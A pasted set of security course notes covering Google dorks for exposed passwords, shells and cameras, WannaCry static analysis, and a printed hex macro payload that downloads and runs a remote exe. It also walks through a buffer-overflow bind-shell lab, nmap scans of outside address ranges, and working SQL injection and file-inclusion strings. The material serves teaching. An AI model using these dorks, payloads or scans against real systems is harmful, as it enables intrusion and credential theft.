· 6 years ago · Mar 16, 2020, 04:44 PM
1#####################################################
2# Offensive/Defensive Cyber #
3# By Joe McCray #
4#####################################################
5
6
7Here are some Google hacking queries to practice.
8
9
10-----------------------
11
12big brother status green
13
14############
15# r57shell #
16############
17inurl:r57 intext:r57 cpu+mem+phpini+phpinfo intitle:r57shell
18r57 "[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]"
19c99 "[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]"
20
21
22
23
24
25#########
26# Cisco #
27#########
28filetype:cfg intext: "enable password" cisco
29inurl:"NetworkConfiguration" cisco
30inurl:"ccmuser" intext:cisco
31inurl:"ccmuser/logon.asp"
32inurl:-cfg intext:"enable password"
33inurl:"level/15/exec/-/show"
34intitle:Cisco Systems, Inc VPN 3000 Concentrator
35
36
37
38###########
39# Windows #
40###########
41filetype:pwd inurl:"/service.pwd"
42ext:ica intext:Password
43ext:reg "Terminal Server Client"
44
45
46
47###########
48# Cameras #
49###########
50inurl:"ViewerFrame?Mode="
51inurl:home/homej.html intitle:snc
52inurl:home/homea.html intitle:snc
53intitle:flexwatch intext:"Home page ver"
54(intext:"MOBOTIX M1" | intext:"MOBOTIX M10") intext:"Open Menu" Shift-Reload
55intitle:"Live View / - AXIS" | inurl:view/view.sht
56
57
58
59
60
61------------------------------------------------------------------------------------------------------------------------------------
62
63- Here is a good set of slides for getting started with Linux:
64http://www.slideshare.net/olafusimichael/linux-training-24086319
65
66
67- Here is a good tutorial that you should complete before doing the labs below:
68http://linuxsurvival.com/linux-tutorial-introduction/
69
70
71- I prefer to use Putty to SSH into my Linux host.
72- You can download Putty from here:
73- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
74
75Here is the information to put into putty
76
77Host Name: 107.191.39.106
78protocol: ssh
79port: 22
80username: ocodco
81password: ocodco123!!!
82
83
84
85
86
87
88Indicators of Compromise (IoC)
89-----------------------------
90
911. Modify the filesystem
922. Modify the registry - ADVAPI32.dll (persistance)
933. Modify processes/services
944. Connect to the network - WS2_32.dll
95
96
97
98if you can't detect a registry change across 5% of your network
99
100
101
102EDR Solution
103------------
104
105
1061. Static Analysis <----------------------------------------- Cloud based static analysis
107Learn everything I can without actually running the file
108 - Modify FS - File integrity checker
109 - Modify registry
110 - Modify processes/services
111 - Connect to the network
112
113
114
1152. Dynamic Analysis
116Runs the file in a VM/Sandbox
117
118################
119# The Scenario #
120################
121You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
122
123
124The fastest thing you can do is perform static analysis.
125
126
127
128
129###################
130# Static Analysis #
131###################
132
133---------------------------Type This-----------------------------------
134
135cd ~/static_analysis
136
137file wannacry.exe
138
139cp wannacry.exe malware.pdf
140
141file malware.pdf
142
143hexdump -n 2 -C wannacry.exe
144
145----------------------------------------------------------------------
146
147
148***What is '4d 5a' or 'MZ'***
149-------------------------Paste this URL into Firefox-----------------------------------
150http://www.garykessler.net/library/file_sigs.html
151---------------------------------------------------------------------------------------
152
153
154
155---------------------------Type This-----------------------------------
156cd ~/static_analysis
157
158objdump -x wannacry.exe
159
160objdump -x wannacry.exe | less
161 q
162
163strings wannacry.exe
164
165strings wannacry.exe | grep -i dll
166
167strings wannacry.exe | grep -i library
168
169strings wannacry.exe | grep -i reg
170
171strings wannacry.exe | grep -i key
172
173strings wannacry.exe | grep -i rsa
174
175strings wannacry.exe | grep -i open
176
177strings wannacry.exe | grep -i get
178
179strings wannacry.exe | grep -i mutex
180
181strings wannacry.exe | grep -i irc
182
183strings wannacry.exe | grep -i join
184
185strings wannacry.exe | grep -i admin
186
187strings wannacry.exe | grep -i list
188----------------------------------------------------------------------
189
190
191
192
193
194---------------------------Type This-----------------------------------
195cd ~/static_analysis
196pe info wannacry.exe
197pe check wannacry.exe
198pe dump --section text wannacry.exe
199pe dump --section data wannacry.exe
200pe dump --section rsrc wannacry.exe
201pe dump --section reloc wannacry.exe
202strings rdata | less
203strings rsrc | less
204strings text | less
205----------------------------------------------------------------------
206
207
208
209
210
211
212
213
214Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
215
216Quick Google search for "wannacry ransomeware analysis"
217
218
219Reference
220https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
221
222- Yara Rule -
223
224
225Strings:
226$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
227$s2 = “Wanna Decryptor” wide ascii nocase
228$s3 = “.wcry” wide ascii nocase
229$s4 = “WANNACRY” wide ascii nocase
230$s5 = “WANACRY!” wide ascii nocase
231$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
232
233
234
235
236
237
238
239Ok, let's look for the individual strings
240
241
242---------------------------Type This-----------------------------------
243cd ~/static_analysis
244
245strings wannacry.exe | grep -i ooops
246
247strings wannacry.exe | grep -i wanna
248
249strings wannacry.exe | grep -i wcry
250
251strings wannacry.exe | grep -i wannacry
252
253strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
254----------------------------------------------------------------------
255
256
257
258
259
260####################################
261# Tired of GREP - let's try Python #
262####################################
263Decided to make my own script for this kind of stuff in the future. This is a really good script for the basics of static analysis
264
265Reference:
266https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
267
268
269This is really good for showing some good signatures to add to the Python script
270
271
272---------------------------Type This-----------------------------------
273cd ~/static_analysis
274
275nano am.py
276
277python3 am.py wannacry.exe
278----------------------------------------------------------------------
279
280
281#####################################################
282# Analyzing Macro Embedded Malware #
283#####################################################
284---------------------------Type This-----------------------------------
285cd ~/static_analysis/oledump
286
287python oledump.py 064016.doc
288
289python oledump.py 064016.doc -s A4 -v
290 -----------------------------------------------------------------------
291
292
293
294- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
295- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
296
297---------------------------Type This-----------------------------------
298python oledump.py 064016.doc -s A5 -v
299-----------------------------------------------------------------------
300
301- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
302
303---------------------------Type This-----------------------------------
304python oledump.py 064016.doc -s A3 -v
305
306- Look for "GVhkjbjv" and you should see:
307
308636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
309
310- Take that long blob that starts with 636D and finishes with 653B and paste it in:
311http://www.rapidtables.com/convert/number/hex-to-ascii.htm
312-----------------------------------------------------------------------
313
314
315
316
317#########################################
318# Security Operations Center Job Roles #
319# Intrusion Analysis Level 1 #
320#########################################
321Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
322 Comfortable with basic network (Network+)
323 Comfortable with security fundamentals (Security+)
324
325
326
327
328
329Job Task: Process security events, follow incident response triage playbook
330
331#########################################
332# Security Operations Center Job Roles #
333# Intrusion Analysis Level 2 #
334#########################################
335
336Required Technical Skills: Comfortable with basic Linux/Windows system administration
337 Comfortable with basic network administration
338 Comfortable with basic programming
339 Comfortable researching IT security issues
340
341
342
343
344
345Job Task: Perform detailed malware analysis, assist with development of the incident response triage playbook
346
347#########################################
348# Security Operations Center Job Roles #
349# Intrusion Analysis Level 3 #
350#########################################
351
352Required Technical Skills: Strong statistical analysis background
353 Strong programming background (C, C++, Java, Assembly, scripting languages)
354 Advanced system/network administration background
355 Comfortable researching IT security issues
356
357
358
359
360
361Job Task: Perform detailed malware analysis
362 Perform detailed statistical analysis
363 Assist with development of the incident response triage playbook
364
365
366
367
368-------------------------------------------------------------------------------------------------------------------------
369#######################
370# Passive Recon #
371# aka: OSINT #
372# aka: Footprinting #
373#######################
374
375- Wikipedia Page
376 - Are they Public or Private?
377 - Does the target have any subsidiaries?
378 - Have they had any scandals?
379
380- Robtex
381 - Show system map
382
383- Sample OSINT Report:
384 https://infosecaddicts-files.s3.amazonaws.com/OSINT_Innophos.doc
385
386- Misc
387 OSINT on a hacker group:
388 https://en.wikipedia.org/wiki/Anonymous_(group)
389 https://en.wikipedia.org/wiki/LulzSec
390
391 OSINT on a terrorist group:
392 https://en.wikipedia.org/wiki/Al-Qaeda
393 https://en.wikipedia.org/wiki/Taliban
394 https://en.wikipedia.org/wiki/Islamic_State_of_Iraq_and_the_Levant
395
396
397###################################
398# Fusion Cell/Threat Intelligence #
399###################################
400
401
402
403
404Mission/Target
405--------------
406- External (company hired to do threat intel for you)
407 - Generic keyword searches for terms that are relevant to your organization
408
409
410- Internal
411 - Analyze indicators and artifacts, and distribute relevant info to appropriate business units
412 - Analyze potential threat actors that may target your organization
413
414
415
416
417Technical Components
418--------------------
419
420Data to analyze:
421 - Feeds (who do you want listen to?)
422 https://github.com/P3t3rp4rk3r/Threat_Intelligence#sources
423
424
425 - Formats (what language do you want to speak)
426 https://github.com/P3t3rp4rk3r/Threat_Intelligence#formats
427
428
429- Platforms
430 - How do we talk to each other and other people (email, phone, postcard)
431
432 Open source platforms
433 https://github.com/OpenCTI-Platform/opencti
434
435
436- Secure Linux OS (Quebes/Tails)
437 Quebes/Tails
438 https://www.fossmint.com/best-linux-distros-for-privacy-security/
439
440- Non-Attrib network
441 Purchase a seperate business internet connection
442
443
444
445
446Sample Reports
447--------------
448- Reports
449 https://github.com/fdiskyou/threat-INTel
450
451
452
453APT Research
454------------
455https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections
456
457
458Threat Analysts Online tools/dashboards
459---------------------------------------
460https://start.me/p/rxRbpo/ti
461
462Step 1: Download Nmap
463--------------------
464Windows: https://nmap.org/dist/nmap-7.70-setup.exe
465Mac OS X: https://nmap.org/dist/nmap-7.70.dmg
466
467Linux:
468--- Fedora/CentOS/RHEL: sudo yum install -y nmap
469--- Ubuntu/Mint/Debian: sudo apt-get install -y nmap
470
471
472
473------------------------------------------------------------------------------------------------------------------------------
474
475
476
477########################
478# Scanning Methodology #
479########################
480
481- I prefer to use Putty to SSH into my Linux host.
482- You can download Putty from here:
483- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
484
485Here is the information to put into putty
486
487Host Name: 107.191.39.106
488protocol: ssh
489port: 22
490username: ocodco
491password: ocodco123!!!
492
493
494- Ping Sweep
495What's alive?
496------------
497Note: On windows you won't need to use the word "sudo" in front of the command below:
498
499---------------------------On Linux or Mac OS X type This-----------------------------------
500sudo nmap -sP 157.166.226.*
501--------------------------------------------------------------------------------------------
502
503
504
505 -if -SP yields no results try:
506Note: On windows you won't need to use the word "sudo" in front of the command below:
507---------------------------On Linux or Mac OS X type This-----------------------------------
508sudo nmap -sL 157.166.226.*
509------------------------------------------------------------------------------------------
510
511
512
513 -Look for hostnames:
514Note: On windows you won't need to use the word "sudo" in front of the command below:
515---------------------------On Linux or Mac OS X type This-----------------------------------
516sudo nmap -sL 157.166.226.* | grep cnn
517-------------------------------------------------------------------------------------------
518
519
520
521- Port Scan
522What's where?
523------------
524Note: On windows you won't need to use the word "sudo" in front of the command below:
525---------------------------On Linux or Mac OS X type This-----------------------------------
526sudo nmap -sS 162.243.126.247
527--------------------------------------------------------------------------------------------
528
529
530
531- Bannergrab/Version Query
532What versions of software are running
533-------------------------------------
534Note: On windows you won't need to use the word "sudo" in front of the command below:
535---------------------------On Linux or Mac OS X type This-----------------------------------
536sudo nmap -sV 162.243.126.247
537-------------------------------------------------------------------------------------------
538
539
540
541Let's dig into this a little bit more:
542-------------------------------------
543Note: On windows you won't need to use the word "sudo" in front of the command below:
544---------------------------On Linux or Mac OS X type This-----------------------------------
545sudo nmap -sV --script=http-headers 162.243.126.247 -p 80,443
546-------------------------------------------------------------------------------------------
547
548
549
550- Vulnerability Research
551Lookup the banner versions for public exploits
552----------------------------------------------
553http://exploit-db.com
554http://securityfocus.com/bid
555https://packetstormsecurity.com/files/tags/exploit/
556
557---------------------------------------------------------------------------------------------------------------------------------
558
559
560
561Network Penetration Testing Process (known vulnerabilities)
562-----------------------------------------------------------
563
564
5651. Ping Sweep:
566The purpose of this step is to identify live hosts
567
568 nmap -sP <ip-address/ip-range>
569
570
5712. Port Scan
572Identify running services. We use the running services to map the network topology.
573
574 nmap -sS <ip-address/ip-range>
575
576
5773. Bannergrab
578Identify the version of version of software running on each port
579
580 nmap -sV <ip-address/ip-range>
581
582
583
5844. Vulnerability Research
585Use the software version number to research and determine if it is out of date (vulnerable).
586
587 exploit-db.com/search
588
589
590
591
592
593
594
595
596
597Skill Level 1. Run the scanners
598-------------------------------
599 Nexpose
600 Qualys
601 Retina
602 Nessus known vulnerabilities
603 OpenVas
604 Foundscan
605 GFI LanGuard
606 NCircle
607
608
609Skill Level 2. Manual vulnerability validation (known vulnerabilities)
610-----------------------------------------------------------------------
611
612 windows -> systeminfo
613 Linux-> dpkg -l (Debian/Ubuntu/Mint)
614 rpm -qa (RHEL/Fedora/Centos)
615
616 Mac OS X-> sudo find / -iname *.app
617
618
619
620
621
622
623
624#####################################
625# Quick Stack Based Buffer Overflow #
626#####################################
627
628- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
629http://45.63.104.73/ExploitLab.zip
630http://45.63.104.73/nc-password-is-netcat.zip <--- save this file to your c:\windows\system32 directory
631
632
633- Extract the ExploitLab.zip file to your Desktop
634
635- Go to folder on your desktop ExploitLab\2-VulnServer, and run vulnserv.exe
636
637
638
639- Open a new command prompt and type:
640
641---------------------------Type This-----------------------------------
642nc localhost 9999
643--------------------------------------------------------------------------
644
645If you don't have netcat you can download it from here:
646http://45.63.104.73/nc-password-is-netcat.zip
647
648The file nc.zip is password protected (password is 'password'), you'll have to exclude it from your anti-virus and either add it to your PATH, or copy it to your c:\Windows\System32\ folder.
649
650
651- In the new command prompt window where you ran nc type:
652HELP
653
654- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
655- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
656
657- Now double-click on 1-simplefuzzer.py
658- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
659
660
661- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
662
663- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
664
665- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
666
667- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
668
669- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
670
671- Calculate the distance to EIP by running script 3-3000chars.py
672- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
673
6744-count-chars-to-EIP.py
675- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
676- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
677
6785-2006char-eip-check.py
679- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
680
6816-jmp-esp.py
682- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
683
6847-first-exploit
685- In this script we actually do the stack overflow and launch a bind shell on port 4444
686
6878 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
688
689
690------------------------------
691
692
693
694Skill Level 3. Identify unknown vulnerabilities
695-----------------------------------------------
696
697- App Type
698------------
699 Stand Alone Client Server Web App
700
701 ***(vulnerserver.exe)***
702
703
704- Input TYpe
705-------------
706 FIle logical network port Browser
707 Keyboard
708 Mouse
709
710
711
712 ***(9999)***
713
714
715- Map & Fuzz app entry points:
716------------------------------
717 - Commands ***(commands)***
718 - Methods
719 - Verbs
720 - functions
721 - subroutines
722 - controllers
723
724
725- Isolate the crash
726-------------------
727App seems to reliably crash at TRUN 2100
728
729
730- Calculate the distance to EIP
731-------------------------------
732Distance to EIP is 2006
733
734We found that EIP was populated with the value: 396F4338
735396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern
736
737An online tool that we can use for this is:
738https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
739
740
741
742- Redirect Program Execution
743----------------------------
744A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
745We learned that we control EAX and ESP in script 2.
746
747
748
749
750
751- Implement Shellcode
752---------------------
753There are only 2 things that can go wrong with shellcode:
754- Not enough space
755- Bad characters
756
757
758
759
760
761
762
763#######################################################
764# Open the following web links below as tabs #
765# For each web link answer all of the questions below #
766#######################################################
767https://www.exploit-db.com/exploits/46762
768https://www.exploit-db.com/exploits/46070
769https://www.exploit-db.com/exploits/40713
770https://www.exploit-db.com/exploits/46458
771https://www.exploit-db.com/exploits/40712
772https://www.exploit-db.com/exploits/40714
773https://www.exploit-db.com/exploits/40680
774https://www.exploit-db.com/exploits/40673
775https://www.exploit-db.com/exploits/40681
776https://www.exploit-db.com/exploits/37731
777https://www.exploit-db.com/exploits/31254
778https://www.exploit-db.com/exploits/31255
779https://www.exploit-db.com/exploits/27703
780https://www.exploit-db.com/exploits/27277
781https://www.exploit-db.com/exploits/26495
782https://www.exploit-db.com/exploits/24557
783https://www.exploit-db.com/exploits/39417
784https://www.exploit-db.com/exploits/23243
785
786
787
788 ###############################
789###################### # Class Exploit Dev Quiz Task # ######################
790 ###############################
791
792
793EID number:
794
7951. Vulnerable Software Info
796 a- Product Name
797 b- Software version
798 c- Available for download
799
800
8012. Target platform
802 a- OS Name (ex: Windows XP)
803 b- Service pack (ex: SP3)
804 c- Language pack (ex: English)
805
806
8073. Exploit info
808 a- modules imported (ex: sys, re, os)
809 b- application entry point (ex: TRUN)
810 c- distance to EIP (ex: 2006)
811 d- how is code redirection done (ex: JMP ESP, JMP ESI)
812 e- number of NOPs (ex: 10 * \x90 = 10 NOPs)
813 f- length of shellcode (ex: 368)
814 g- bad characters (ex: \x0a\x00\x0d)
815 h- is the target ip hard-coded
816 i- what does the shellcode do (ex: bind shell, reverse shell, calc)
817 j- what is the total buffer length
818 k- does the exploit do anything to ensure the buffer doesn't exceed a certain length
819 l- Is this a server side or client-side exploit
820
821
822
823
824
825
826
827
828#########################################
829# FreeFloat FTP Server Exploit Analysis #
830#########################################
831
832
833
834Analyze the following exploit code:
835https://www.exploit-db.com/exploits/15689/
836
8371. What is the target platform that this exploit works against?
8382. What is the variable name for the distance to EIP?
8393. What is the actual distance to EIP in bytes?
8404. Describe what is happening in the variable ‘junk2’
841
842
843
844
845Analysis of the training walk-through based on EID: 15689:
846http://45.63.104.73/ff.zip
847
848
849
850
851ff1.py
8521. What does the sys module do?
8532. What is sys.argv[1] and sys.argv[2]?
8543. What application entry point is being attacked in this script?
855
856
857
858ff2.py
8591. Explain what is happening in lines 18 - 20 doing.
8602. What is pattern_create.rb doing and where can I find it?
8613. Why can’t I just double click the file to run this script?
862
863
864
865ff3.py
8661. Explain what is happening in lines 17 - to 25?
8672. Explain what is happening in lines 30 - to 32?
8683. Why is everything below line 35 commented out?
869
870
871
872ff4.py
8731. Explain what is happening in lines 13 to 15.
8742. Explain what is happening in line 19.
8753. What is the total length of buff?
876
877
878
879ff5.py
8801. Explain what is happening in line 15.
8812. What is struct.pack?
8823. How big is the shellcode in this script?
883
884
885
886ff6.py
8871. What is the distance to EIP?
8882. How big is the shellcode in this script?
8893. What is the total byte length of the data being sent to this app?
890
891
892
893
894ff7.py
8951. What is a tuple in python?
8962. How big is the shellcode in this script?
8973. Did your app crash in from this script?
898
899
900
901
902ff8.py
9031. How big is the shellcode in this script?
9042. What is try/except in python?
9053. What is socket.SOCK_STREAM in Python?
906
907
908
909ff9.py
9101. What is going on in lines 19 and 20?
9112. What is the length of the NOPs?
9123. From what DLL did the address of the JMP ESP come from?
913
914
915
916
917ff010.py
9181. What is going on in lines 18 - 20?
9192. What is going on in lines 29 - 32?
9203. How would a stack adjustment help this script?
921
922
923
924#########################################
925# Offensive Cyber Operations Job Roles #
926# Offensive Cyber Level 1 #
927#########################################
928Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
929 Comfortable with basic network (Network+)
930 Comfortable with security fundamentals (Security+)
931
932
933
934Job Task: Run network security scanners and assist with documentation of known vulnerabilities
935
936
937Tools Used:
938 Nmap
939 Nexpose
940 Qualys
941 Retina
942 Nessus known vulnerabilities
943 OpenVas
944 Foundscan
945 GFI LanGuard
946 NCircle
947
948
949
950#########################################
951# Offensive Cyber Operations Job Roles #
952# Offensive Cyber Level 2 #
953#########################################
954Required Technical Skills: Comfortable with basic Linux/Windows system administration
955 Comfortable with basic network administration
956 Comfortable with basic programming
957 Comfortable researching IT security issues
958
959
960
961Job Task: Run network security scanners and assist with document of known vulnerabilities
962 Perform manual vulnerability validation
963 Analyze public exploit and develop threat analysis reports
964 Assess simple applications for vulnerabilities
965
966
967
968#########################################
969# Security Operations Center Job Roles #
970# Offensive Cyber Level 3 #
971#########################################
972
973Required Technical Skills: Strong programming background (C, C++, Java, Assembly, scripting languages)
974 Advanced system/network administration background
975 Comfortable researching IT security issues
976
977
978
979
980
981Job Task: Perform manual vulnerability validation
982 Analyze public exploit and develop threat analysis reports
983 Assess complex applications for vulnerabilities
984
985
986
987
988
989
990
991
992##################################
993# Basic: Web Application Testing #
994##################################
995
996Most people are going to tell you reference the OWASP Testing guide.
997https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
998
999I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
1000
1001
1002The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
1003
1004 1. Does the website talk to a DB?
1005 - Look for parameter passing (ex: site.com/page.php?id=4)
1006 - If yes - try SQL Injection
1007
1008 2. Can I or someone else see what I type?
1009 - If yes - try XSS
1010
1011 3. Does the page reference a file?
1012 - If yes - try LFI/RFI
1013
1014Let's start with some manual testing against 45.63.104.73
1015
1016
1017#######################
1018# Attacking PHP/MySQL #
1019#######################
1020
1021Go to LAMP Target homepage
1022http://45.63.104.73/
1023
1024
1025
1026Clicking on the Acer Link:
1027http://45.63.104.73/acre2.php?lap=acer
1028
1029 - Found parameter passing (answer yes to question 1)
1030 - Insert ' to test for SQLI
1031
1032---------------------------Type This-----------------------------------
1033
1034http://45.63.104.73/acre2.php?lap=acer'
1035
1036-----------------------------------------------------------------------
1037
1038Page returns the following error:
1039You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1
1040
1041
1042
1043In order to perform union-based sql injection - we must first determine the number of columns in this query.
1044We do this using the ORDER BY
1045
1046---------------------------Type This-----------------------------------
1047
1048http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
1049-----------------------------------------------------------------------
1050
1051Page returns the following error:
1052Unknown column '100' in 'order clause'
1053
1054
1055---------------------------Type This-----------------------------------
1056
1057http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
1058-----------------------------------------------------------------------
1059
1060Page returns the following error:
1061Unknown column '50' in 'order clause'
1062
1063
1064---------------------------Type This-----------------------------------
1065
1066http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
1067-----------------------------------------------------------------------
1068
1069Page returns the following error:
1070Unknown column '25' in 'order clause'
1071
1072
1073---------------------------Type This-----------------------------------
1074
1075http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
1076-----------------------------------------------------------------------
1077
1078Page returns the following error:
1079Unknown column '12' in 'order clause'
1080
1081
1082---------------------------Type This-----------------------------------
1083
1084http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
1085-----------------------------------------------------------------------
1086
1087---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
1088
1089
1090
1091Now we build out the union all select statement with the correct number of columns
1092
1093Reference:
1094http://www.techonthenet.com/sql/union.php
1095
1096
1097---------------------------Type This-----------------------------------
1098
1099http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
1100-----------------------------------------------------------------------
1101
1102
1103
1104Now we negate the parameter value 'acer' by turning into the word 'null':
1105---------------------------Type This-----------------------------------
1106
1107http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
1108-----------------------------------------------------------------------
1109
1110We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
1111
1112
1113Use a cheat sheet for syntax:
1114http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
1115
1116---------------------------Type This-----------------------------------
1117
1118http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
1119
1120http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
1121
1122http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
1123
1124http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
1125
1126
1127http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
1128
1129-----------------------------------------------------------------------
1130
1131
1132
1133########################
1134# Question I get a lot #
1135########################
1136Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
1137
1138Here is a good reference for it:
1139https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
1140
1141Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
1142
1143
1144
1145
1146#########################
1147# File Handling Attacks #
1148#########################
1149
1150Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
1151
1152---------------------------Type This-----------------------------------
1153
1154http://45.63.104.73/showfile.php?filename=about.txt
1155
1156-----------------------------------------------------------------------
1157
1158
1159See if you can read files on the file system:
1160---------------------------Type This-----------------------------------
1161
1162http://45.63.104.73/showfile.php?filename=/etc/passwd
1163-----------------------------------------------------------------------
1164
1165We call this attack a Local File Include or LFI.
1166
1167Now let's find some text out on the internet somewhere:
1168https://www.gnu.org/software/hello/manual/hello.txt
1169
1170
1171Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
1172
1173---------------------------Type This-----------------------------------
1174
1175http://45.63.104.73/showfile.php?filename=https://www.gnu.org/software/hello/manual/hello.txt
1176-----------------------------------------------------------------------
1177
1178#########################################################################################
1179# SQL Injection #
1180# http://45.63.104.73/1-Intro_To_SQL_Intection.pptx #
1181#########################################################################################
1182
1183
1184- Another quick way to test for SQLI is to remove the paramter value
1185
1186
1187#############################
1188# Error-Based SQL Injection #
1189#############################
1190---------------------------Type This-----------------------------------
1191
1192http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
1193http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
1194http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
1195http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
1196http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
1197http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
1198http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
1199http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
1200http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
1201
1202-----------------------------------------------------------------------
1203
1204
1205
1206#############################
1207# Union-Based SQL Injection #
1208#############################
1209
1210---------------------------Type This-----------------------------------
1211
1212http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
1213http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
1214http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
1215http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
1216http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
1217http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
1218http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
1219http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
1220http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
1221http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
1222-----------------------------------------------------------------------
1223
1224 We are using a union select statement because we are joining the developer's query with one of our own.
1225 Reference:
1226 http://www.techonthenet.com/sql/union.php
1227 The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
1228 It removes duplicate rows between the various SELECT statements.
1229
1230 Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
1231
1232---------------------------Type This-----------------------------------
1233
1234http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
1235-----------------------------------------------------------------------
1236
